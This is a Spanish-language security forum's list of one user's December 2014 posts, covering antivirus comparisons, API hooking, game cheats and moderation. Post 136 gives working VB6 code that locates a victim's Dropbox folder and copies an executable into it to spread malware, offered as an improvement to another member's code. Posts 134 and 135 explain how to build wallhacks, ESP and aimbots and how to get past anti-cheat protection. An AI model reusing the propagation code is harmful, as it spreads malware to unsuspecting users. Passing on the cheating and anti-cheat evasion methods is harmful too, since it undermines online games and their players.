|
131
|
Seguridad Informática / Seguridad / Re: Los mejores antivirus gratuitos
|
en: 19 Diciembre 2014, 10:13 am
|
Ya se ha dicho varias veces en el foro, pero lo podemos repetir una vez más Hablar de "mejor antivirus" es muy general, esa pregunta no tiene una respuesta correcta... lo mejor es separar los antivirus por "áreas" y analizarlos desde ahí, ejemplo: Mejor antivirus mirando tasas de detección Mejor antivirus mirando rendimiento y velocidad Mejor antivirus mirando motor de heuristica para muestras desconocidas Mejor antivirus mirando áreas d eprotección (mail, cloudscanning, firewall, etc....) ... En cada sección podrás situar a cada antivirus y luego hacer una media según lo que TU consideres más importante... por ejemplo hay gente que le importa más el rendimiento que el % de detección y viceversa. Así es como realmente podrás hacer un estudio "real" y equitativo. Para ello la gente de AV-COMPARATIVES lleva años haciendo ese trabajo mes a mes, midiendo y puntuando todos los AV's del mercado bajo las premisas que he puesto antes, ejemplo: Aquí están todos los test por separado, en cada uno aparece un ganador y luego hacen la media. Os dejo el report del último mes: Test de mejor AV detectando malware: http://www.av-comparatives.org/wp-content/uploads/2014/10/avc_fdt_201409_en.pdfTest de mejor antivirus con mejor "perfomance": http://www.av-comparatives.org/wp-content/uploads/2014/11/avc_per_201410_en.pdfTest del mejor AV con mejor heuristica/proactiva: http://www.av-comparatives.org/wp-content/uploads/2014/07/avc_beh_201403_en.pdfTest del mejor AV eliminando malware ya infectado: http://www.av-comparatives.org/wp-content/uploads/2014/12/avc_rem_201411_en.pdf------------------------------------------------------ Con esos datos presentes... ¿cual antivirus es mejor? Pues depende... si te interesa un AV ligero el mejor es ESET NOD32. SI buscas un AV que detecte lo máximo posible: AVIRA. ¿El mejor antivirus con la mejor Heuristica/proactiva? Bitdefender Ala, aquí tienes la respuesta
|
|
|
133
|
Seguridad Informática / Análisis y Diseño de Malware / Re: [?] Proactiva?
|
en: 18 Diciembre 2014, 09:25 am
|
Algunas proactivas de los AV monitorizan las llamadas a las API's, así detectan comportamientos sospechosos.
Por ejemplo, si un ejecutable, hace una llamada a RegOpenKeyEx (para leer el registro), la proactiva del AV puede "hookear" esa llamada, leer los parametros y comprobar si se está accediendo a HKLM\Software\Microsoft\Windows\CurrentVersion\Run y detectar así un intento de autorun. Lo mismo para APIS de borrar ficheros, copiar, etc...
Saludos
|
|
|
134
|
Programación / Ingeniería Inversa / Re: [Videotutoriales] Hacking de juegos (Online/Local, Cheat Engine, OllyDbg...)
|
en: 17 Diciembre 2014, 17:07 pm
|
Hola Blipi. Soy nuevo en esto, pero quiero aprender. Te digo, mi objetivo es aprender a crear wall hack y/o marcar enemigos para juegos de disparos en 1ra persona en juegos online que son de servidores como los de facebook y otras paginas. Use hacks ya creados que los descargaba desde distintas paginas y creo que eran hechos con cheat engine de marcar enemigos, pero o duran muy poco tiempo o te banean la cuenta. Puedes enseñarme? Gracias
Hola, eso que quieres hacer no es tan facil. Te doy las indicaciones BASICAS y ya decides tú mismo si te interesa seguir aprendiendo o no: Wallhack: Tienes que conocer que render utiliza el juego (normalmente suele ser DirectX o OpenGL). Tendrás que inyectar en el proceso y hookear la librería DirectX o OpenGL, a partir de ahí usando las funciones propias del render podrás listar las estructuras generadas (los objetos del juego), disecciona dichas estructuras y quédate con lo que sean paredes (por ejemplo), llama a la función wireframe del render para convertirla en líneas, cambia el alphabending o el zorder, ejemplos: WIREFRAME:ALPHABENDING: ZORDER: Sobre lo que comentas para marcar enemigos.... eso se llama ESP HACK y es bastante más complejo que el wallhack. Me explico: Necesitas injectar código en la función del juego que controla el movimiento de los objetos o localizar el pointer correcto que almacena las coordenadas X Y Z de cada objeto del juego. Una vez tengas eso necesitarás programar MUY BIEN y saber matemáticas: Conociendo la posición X Y Z de tu personaje y la posición X Y Z de los enemigos, tendrás que aplicar formulas matemáticas de triangulación para conocer el punto exacto de la pantalla donde se posiciona un enemigo: LEE AQUI: http://es.wikipedia.org/wiki/Triangulaci%C3%B3nCuando lo tengas controlado, deberás hookear el render de OpenGL o DirectX para dibujar un recuadro justo encima de esa posición, el tamaño dependerá del factor Z que indica lo lejos que está el enemigo: Si encima quieres un aimbot, hookea el mouse y haz que el puntero de tu personaje se situe en cada enemigo a partir de su posición triangulada PEEEEERO deberás listar todos los objetos del juego para saber si hay una pared o no entre tu personaje y el enemigo, evitando así que gastes munición inútilmente. Luego hay otros tipos de hacks como el lambert, norecoil, no spread, fullbright, quickswap, teleporthack, etc... si tienes dudas me preguntas. Y ya está, como ves es muy complejo. Se necesitan conocimientos ELEVADOS de programación, hooks y matemáticas, muchisimo tiempo y ganas de aprender. Saludos
|
|
|
135
|
Programación / Ingeniería Inversa / Re: [AYUDA] Con Codigos Cheat Engine
|
en: 17 Diciembre 2014, 16:51 pm
|
Hola, vayamos por partes... ya que no me queda nada clara tus dudas:
EL juego es online? Olvidate de utilizar CE, si el juego está correctamente programado no podrás modificar nada en local.
Los codigos que pones... que son? de donde los has sacado? Parecen cheatcodes internos del juego, es posible? Como cheatcode me refiero al iddqd del doom por ejemplo.
@Orb, algunos juegos online almacenan variables locales que pueden ser modificadas, la mayoría de timers, contadores y coordenadas se suelen gestionar en local. Por ello se pueden ver speedhackers en juegos online la mayoría de veces. En juegos FPS (first person shooters), los cálculos del spread de las balas se suele hacer en local (ya que el server no aguantaría la demanda de responder cuantos grados se ha de desviar las balas de TODAS las ametralladoras de una misma partida). COsas así se pueden hackear aún siendo online.
Por lo ultimo que comentas del crash.. es posible que ese juego online tenga protección anticheats, prueba de configurar el CE en modo VEH debugger, pero no suele ser tan fácil... Si tu procesador lo soporta, carga la maquina virtual DBVM y mete el debugger por driver.
Saludos
|
|
|
136
|
Seguridad Informática / Análisis y Diseño de Malware / Re: [VBS] [SOURCE] Dropbox Spread
|
en: 9 Diciembre 2014, 09:45 am
|
El código no está mal, pero no está correctamente implementado. Utilizas rutas estáticas... que ocurre si ejecutas tu código en un PC cuya carpeta de dropbox esté en "E:\ejemplo\mi_dropbox" ? Para ello utiliza lo siguiente: '--------------------------------------------------------------------------------------- ' Modulo : SpreadDropbox ' Autor : uddtools.com ' Adapatdo: MadAntrax ' Fecha : 16/09/2013 ' Finalidad : Infectar la carpeta compartida Dropbox ' Uso : Call DropboxSpread(App.Path & "\" & App.EXEName & ".exe", "dropbox_spread.exe") ' Idea extraída del foro uddtools.com, se ha modificado el código quitado dependencias ' a Microsoft Scripting Runtime '--------------------------------------------------------------------------------------- Private Sub Form_Load() MsgBox "Dropbox Folder = " & getDropboxPath Call DropboxSpread(App.Path & "\" & App.EXEName & ".exe", "dropbox_spread.exe") End Sub Public Sub DropboxSpread(sFilePath As String, sFileName As String) FileCopy sFilePath, getDropboxPath & "\" & sFileName End Sub Private Function getDropboxPath() As String getDropboxPath = Base64Decode(Read_host(Environ("APPDATA") & "\Dropbox\host.db")) End Function Private Function Read_host(sFile As String) As String Dim Code As String Open sFile For Binary Access Read As #1 Code = Space(LOF(1)) Get #1, , Code Close #1 Read_host = Split(Code, Chr(10))(1) End Function 'Credits to pscode.com Function Base64Decode(ByVal base64String As String) As String Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" Dim dataLength, sOut, groupBegin base64String = Replace(base64String, vbCrLf, "") base64String = Replace(base64String, vbTab, "") base64String = Replace(base64String, " ", "") dataLength = Len(base64String) If dataLength Mod 4 <> 0 Then Exit Function For groupBegin = 1 To dataLength Step 4 Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut numDataBytes = 3 nGroup = 0 For CharCounter = 0 To 3 thisChar = Mid(base64String, groupBegin + CharCounter, 1) If thisChar = "=" Then numDataBytes = numDataBytes - 1 thisData = 0 Else thisData = InStr(1, Base64, thisChar, vbBinaryCompare) - 1 End If If thisData = -1 Then Exit Function nGroup = 64 * nGroup + thisData Next nGroup = Hex(nGroup) nGroup = String(6 - Len(nGroup), "0") & nGroup pOut = Chr(CByte("&H" & Mid(nGroup, 1, 2))) + Chr(CByte("&H" & Mid(nGroup, 3, 2))) + Chr(CByte("&H" & Mid(nGroup, 5, 2))) sOut = sOut & Left(pOut, numDataBytes) Next Base64Decode = sOut End Function
|
|
|
137
|
Seguridad Informática / Análisis y Diseño de Malware / Re: [VBS] [SOURCE] DDOS
|
en: 9 Diciembre 2014, 09:40 am
|
siento que la gente solo lee mi primer parrafo siempre XD
en general el problema es que ping es muy lento, es tcp, espera respuesta del servidor, etc... tiene una serie de problemas relacionados para ese fin
Los paquetes ping son ICMP, tan facil como bloquear el trafico ICMP en tu iptables y quedaría negado ese "ataque". No se puede "denegar" una máquina con paquetes ICMP ping, nunca. Ni aunque estemos en 1998 y el servidor atacado sea un Pentium pro de 100MB de ram.
|
|
|
138
|
Seguridad Informática / Análisis y Diseño de Malware / Re: # Nuevo Proyecto Malware Detector #
|
en: 5 Diciembre 2014, 11:38 am
|
Bueno, éste tema ya se ha desviado lo suficiente como para que tenga que venir MadAntrax a cerrarlo...
El usuario se ha conectado por TOR y ha usado el mail falso para registrarse, su forma de escribir coincide con la de RMax...
No me voy a precipitar, no es mi trabajo hacer de Sherlock Holmes, pero reconozco que me ha temblado el dedo sobre el botón de banear.
|
|
|
140
|
Seguridad Informática / Hacking Wireless / Re: Hackear pagina web mediante ip
|
en: 2 Diciembre 2014, 09:29 am
|
Hola buenas, soy nuevo en esto y querría saber que podría pasar si hackeara una página web normalita solo por diversion (sin modificar,ni alterar, ni robar datos) solamente por el mero hecho de llevarme la satisfacción de haber logrado superar la seguridad de una página. La verdad que pregunto esto porque me preocupa bastante el tema del castigo penal en españa y sé que entrar en cualquier página o sitio sin permiso es un delito, lo que no entiendo es porque se tiene que penalizar a alguien que simplemente quiere desarrollar sus capacidades informáticas, sin ninguna mala intención y sin hacer daño a nadie.
Un saludo, gracias.
querría saber que podría pasar si hackeara una página web normalita solo por diversionPosiblemente termines en la cárcel. sé que entrar en cualquier página o sitio sin permiso es un delitoCorrecto, es un delito. No lo hagas no entiendo es porque se tiene que penalizar a alguien que simplemente quiere desarrollar sus capacidades informáticasDigamos que a mi me interesa desarrollar mis artes de robar coches, pero no por ello me van a dejar robar coches, aunque ello vaya a desarrollar mis capacidades... Ahora que te he contestado, medita un poco y no vuelvas a postear nada semejante a ésto. Buenos días
|
|
|
|
|
|
|